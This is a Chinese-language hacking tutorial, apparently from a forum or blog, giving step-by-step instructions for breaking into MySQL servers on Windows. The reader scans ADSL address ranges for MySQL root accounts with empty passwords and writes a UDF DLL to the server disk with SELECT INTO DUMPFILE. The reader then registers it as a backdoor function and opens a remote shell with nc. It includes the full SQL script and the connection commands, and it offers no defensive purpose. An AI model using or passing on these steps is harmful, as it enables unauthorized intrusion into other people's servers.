今年五月mix在幻影论坛公布了一篇关于mysql入侵的文章(<
执行系统命令>>,连接地址http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006),反应强烈.随
后不久,黑客基地古典辣m做了个演示动画,可惜其中的用到mysql.txt并没有公布,造成很多不熟悉mysql的
人不能实战入侵mysql.
其实通过注册mysql 的UDF DLL中自写的Function而执行任意命令早在去年12月已经公布了,参看文章
http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=33331而mix实现直接从mysql客户端传送二
进制文件进入服务端硬盘中,不得不说是一个了不起的发现!下面我来说说我的入侵实战!
1.打开hscan1.2扫描一段ip,我推荐大家扫描adsl所在的ip段,因为这些段ip的主人安全意思差,从而
能扫到大量的mysql的root口令为空且有访问mysql默认数据库mysql的权限.
2.在自己的机器上装个mysql for windows.下载地址
http://download.pchome.net/internet/server/dbserver/2506.html
3.在幻影论坛下载个my_udf.dll或者mix.dll(我比较偏好my_udf.dll,因为mix.dll会造成mysql假
死).
4.运行winhex,打开my_udf.dll,点edit菜单下面的copy all选hex values;打开记事本,点粘贴,这样
就把十六进制的my_udf.dll复制进去了!
5.再打开另外个记事本写入如下语句:
use mysql;
set @a=concat('',0x...)
create table Mix(data LONGBLOB);
insert into Mix values("");update Mix set data = @a;
select data from Mix into DUMPFILE 'c:my_udf.dll';
CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'c:my_udf.dll';
select my_udfdoor('');
6.把第四步中记事本上的十六进制数据复制出来替换掉第5步中第二行语句中的"...",并保存到c盘根
目录下面,命名为mysql.txt.
7.在本地打开一个dos命令窗口,跳转到mysql安装目录下面,输入mysql -h218.1.1.1 -uroot -p123
(注意,把218.1.1.1,root,123分别替换为你的hscan扫描到的ip,username,password的值.如果password的
值为空,则可以不需要参数-p);
8.在第7步中连接成功远程mysql服务器的话,就输入 . c:mysql.txt并敲一下回车.如果远程mysql
是运行在windows操作系统下的且你扫描到的mysql帐号权限足够高的话,就会成功在远程服务器上装上你
的后门.
9.最后用nc来连接此服务器的3306端口,并输入密码fuck,按回车,如果shell没有出来,就多敲几次回
车.如果还是不出shell,那就换个目标试一试吧.
标签: